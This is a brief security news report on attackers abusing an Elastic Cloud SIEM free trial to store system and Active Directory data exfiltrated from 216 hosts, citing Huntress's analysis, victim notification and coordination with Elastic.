Elastic Cloud SIEM free trial exploited for exfiltrated data storage

Infosecurity Magazine reports that Elastic Cloud had a free trial of its security information and event management platform harnessed to store data pilfered from hundreds of systems as part of an attack campaign that involved the exploitation of various software flaws.

Infiltrated systems have been injected with an encoded PowerShell command enabling the exfiltration of system information, Active Directory details, hardware specifications, and installed patch information to an ElasticSearch index, according to Huntress analysts. The attacker used a disposable email address tied to quieresmail[.]com to register the trial account, which was active for days after its creation on Jan. 28. At least 216 hosts across 34 AD domains, most of which are servers owned by financial services firms, government entities, IT service providers, manufacturing firms, and educational institutions, have been impacted by the campaign.

"We have performed outreach and victim notification to organizations that we believe were indicated within the uncovered data, and we have coordinated with Elastic in a collaborative effort to further investigate and take down this threat actor infrastructure," said Huntress.